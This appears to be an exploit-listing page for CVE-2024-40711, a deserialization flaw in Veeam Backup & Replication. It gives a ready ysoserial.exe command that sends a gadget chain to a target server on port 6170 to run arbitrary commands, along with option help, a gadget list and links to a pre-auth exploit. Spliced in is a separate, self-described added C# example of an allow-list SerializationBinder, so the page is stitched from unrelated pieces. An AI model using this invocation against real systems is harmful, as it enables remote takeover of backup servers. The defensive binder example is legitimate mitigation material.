## https://sploitus.com/exploit?id=8F3163F4-A918-511B-9906-2420C9711DAB
# Usage

```
.\ysoserial.exe -f BinaryFormatter -g Veeam -c {localhostServer} -vi {targetIP} -vp 6170 -vg DataSet -vc "cmd /c mspaint.exe"
```

```
Usage: ysoserial.exe [options]
Options:
      --vi, --targetveeamip=VALUE
                             The target Veeam Backup and reaplication IP
                               address
      --vp, --targetveeamport=VALUE
                             The target Veeam Backup and reaplication port
                               (default: 6170)
      --vc, --veeamexpcmd=VALUE
                             The target Veeam Backup and reaplication what
                               commands will be executed
      --vg, --veeamgadget=VALUE
                             The target Veeam Backup and reaplication what
                               gadget will be use (default: DataSet)
```

![cve-2024-4711](./assets/cve-2024-4711.gif)

Other gadget chains

```
Supported gadgets are: ActivitySurrogateDisableTypeCheck , ActivitySurrogateSelector , ActivitySurrogateSelectorFromFile , AxHostState , BaseActivationFactory , ClaimsIdentity , ClaimsPrincipal , DataSet , DataSetOldBehaviour , DataSetOldBehaviourFromFile , DataSetTypeSpoof , Generic , GenericPrincipal , GetterCompilerResults , GetterSecurityException , GetterSettingsPropertyValue , ObjectDataProvider , ObjRef , PSObject , ResourceSet , RolePrincipal , SessionSecurityToken , SessionViewStateHistoryItem , TextFormattingRunProperties , ToolboxItemContainer , TypeConfuseDelegate , TypeConfuseDelegateMono , Veeam , WindowsClaimsIdentity , WindowsIdentity , WindowsPrincipal , XamlAssemblyLoadFromFile , XamlImageInfo
```

The gadget chain used must be one that SoapFormatter supports.
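The gadget chains listed above all rely on the formatter resolving whatever type name appears in the stream. As an added defensive example (not code from this page, from ysoserial.net or from Veeam), the following shows the mitigation a service owner would want: a type allow-list `SerializationBinder` attached to `BinaryFormatter`, which refuses an unlisted type such as `System.Data.DataSet` (the page's default `-vg DataSet`) before its deserialization constructor can run. `BackupJobInfo` and `AllowListBinder` are hypothetical names, and the code assumes .NET Framework, where `BinaryFormatter` is still available.

```csharp
using System;
using System.Collections.Generic;
using System.Data;
using System.IO;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;

// Hypothetical application type the service legitimately expects to receive.
[Serializable]
public sealed class BackupJobInfo
{
    public string JobName { get; set; }
}

// Allow-list binder: the formatter asks it to resolve every non-primitive type
// name in the stream; anything not explicitly listed (DataSet,
// ObjectDataProvider, ...) is refused before that type is instantiated.
public sealed class AllowListBinder : SerializationBinder
{
    private static readonly Dictionary<string, Type> Allowed = new Dictionary<string, Type>
    {
        [typeof(BackupJobInfo).FullName] = typeof(BackupJobInfo),
    };

    public override Type BindToType(string assemblyName, string typeName)
    {
        if (Allowed.TryGetValue(typeName, out var type))
            return type;
        throw new SerializationException($"Refusing to deserialize type '{typeName}'");
    }
}

public static class Demo
{
    static byte[] Serialize(object graph)
    {
        var ms = new MemoryStream();
        new BinaryFormatter().Serialize(ms, graph); // sender side is unchanged
        return ms.ToArray();
    }

    static object DeserializeChecked(byte[] data)
    {
        var bf = new BinaryFormatter { Binder = new AllowListBinder() };
        return bf.Deserialize(new MemoryStream(data));
    }

    public static void Main()
    {
        var ok = (BackupJobInfo)DeserializeChecked(Serialize(new BackupJobInfo { JobName = "nightly" }));
        Console.WriteLine($"accepted: {ok.JobName}");

        // Benign, empty DataSet (constructed sample): same root type as the DataSet
        // gadget, but with no allow-list entry the binder rejects it.
        try { DeserializeChecked(Serialize(new DataSet("d"))); }
        catch (SerializationException e) { Console.WriteLine($"rejected: {e.Message}"); }
    }
}
```

On .NET 5 and later `BinaryFormatter` is obsolete and disabled by default; the allow-list principle carries over, but replacing the formatter is the preferred fix there.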

# References

[watchtowrlabs/CVE-2024-40711: Pre-Auth Exploit for CVE-2024-40711 (github.com)](https://github.com/watchtowrlabs/CVE-2024-40711)

[Veeam Backup & Response - RCE With Auth, But Mostly Without Auth (CVE-2024-40711) (watchtowr.com)](https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/)